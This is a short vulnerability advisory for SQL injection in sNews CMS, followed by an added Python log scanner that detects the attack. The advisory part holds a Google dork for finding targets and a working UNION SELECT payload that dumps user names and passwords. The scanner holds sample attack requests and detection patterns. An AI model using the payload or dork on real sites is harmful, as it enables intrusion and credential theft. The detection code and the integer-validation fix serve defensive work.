Title: CMS snews SQL Injection Vulnerability
Author: onestree
Download: http://snewscms.com/
Tested on: ubuntu 12.10 / win 7
Keyword: inurl:"tanyakan pada rumput yang bergoyang"

*************************************************************

SQL poc:

http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]

Example:

http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
Thanks:

Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell

indonesiancoder - moeslimh4x0r - go-coder

spesial my hunny :*
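
For defenders, requests of the shape shown in the example can be found in web server access logs by undoing the `/**/` comment-as-whitespace trick before matching. The following Python code is an added example, not part of the original advisory or of sNews; it assumes Apache/nginx-style access log lines and that legitimate `id` values are digits only, and the log lines and client addresses are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (documentation IPs, not real traffic).
SAMPLE_LOG = [
    '192.0.2.5 - - [01/Jan/2013:10:00:00 +0000] "GET /snews/snews.php?act=shownews&id=23 HTTP/1.1" 200 5120',
    '192.0.2.9 - - [01/Jan/2013:10:00:07 +0000] "GET /snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,2/**/from/**/t/* HTTP/1.1" 200 812',
    '192.0.2.9 - - [01/Jan/2013:10:00:09 +0000] "GET /snews/snews.php?act=shownews&id=5%20OR%201%3D1 HTTP/1.1" 200 5120',
    '192.0.2.7 - - [01/Jan/2013:10:00:11 +0000] "GET /snews/snews.php?act=list HTTP/1.1" 200 900',
]

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQL_COMMENT = re.compile(r"/\*.*?(?:\*/|$)", re.S)  # also an unterminated trailing /*

def normalize(value):
    """Undo comment-as-whitespace obfuscation: each /**/ becomes one space."""
    text = SQL_COMMENT.sub(" ", value)
    return re.sub(r"\s+", " ", text).strip().lower()

def classify(raw_id):
    """Return None for a plain integer id, otherwise a label for the anomaly."""
    if re.fullmatch(r"[0-9]+", raw_id):  # assumption: legitimate ids are digits only
        return None
    if re.search(r"\bunion(?: all)? select\b", normalize(raw_id)):
        return "union-select"
    return "non-numeric-id"

def scan(lines):
    """Return (client, label, normalized id) for suspicious shownews requests."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
        if not url.path.endswith("/snews.php") or params.get("act") != ["shownews"]:
            continue
        for raw_id in params.get("id", []):
            label = classify(raw_id)
            if label:
                findings.append((client, label, normalize(raw_id)))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule is the fix on the application side: cast or validate `id` as an integer, or bind it as a query parameter, before it reaches the database.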